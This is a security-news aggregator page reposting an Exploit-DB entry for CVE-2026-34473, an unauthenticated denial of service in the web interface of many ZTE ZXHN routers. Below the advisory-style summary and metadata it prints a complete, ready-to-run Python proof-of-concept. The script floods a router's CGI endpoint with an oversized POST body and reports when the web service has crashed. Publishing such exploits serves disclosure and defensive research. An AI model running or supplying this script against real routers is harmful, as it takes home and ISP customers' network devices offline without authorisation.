Security News

Cybersecurity news aggregator

HIGH Vulnerabilities Exploit-DB

[local] ZTE Routers - Unauthenticated Denial of Service

A vulnerability (CVE-2026-34473, CVSS 7.5 HIGH) in the CGILua post.lua parser of multiple ZTE ZXHN router models allows unauthenticated denial of service: a single oversized POST request to any CGI endpoint crashes the web service. The vulnerability affects 17+ models, with an estimated 140,000+ devices exposed. A proof-of-concept script is publicly available, and users should consult the vendor for specific patching guidance.

EXPLOIT DATABASE

ZTE Routers - Unauthenticated Denial of Service

EDB-ID: 52594
CVE: 2026-34473
EDB Verified:
Author: MINA NAGEH SALALMA
Type: LOCAL
Platform: MULTIPLE
Date: 2026-05-29

# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices
# CVE: CVE-2026-34473
# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473

# PoC (Python 3)
import requests
import sys


def dos_exploit(target, size_kb=256):
    """
    CVE-2026-34473 - Unauthenticated DoS
    Sends oversized POST body to crash ZTE CGILua web service.
    """
    url = f"http://{target}/cgi-bin/luci"
    payload = "a=" + "A" * (size_kb * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"[+] {target} responded with HTTP {r.status_code} (device may still be up)")
    except requests.exceptions.ConnectionError:
        print(f"[!] {target} - Connection refused or dropped: device web service likely crashed (DoS successful)")
    except requests.exceptions.Timeout:
        print(f"[!] {target} - Timeout: device web service unresponsive (DoS successful)")
    except Exception as e:
        print(f"[-] {target}: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: poc.py <target_ip> [payload_size_kb]")
        sys.exit(1)
    size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    dos_exploit(sys.argv[1], size)

Tags:
Advisory/Source: Link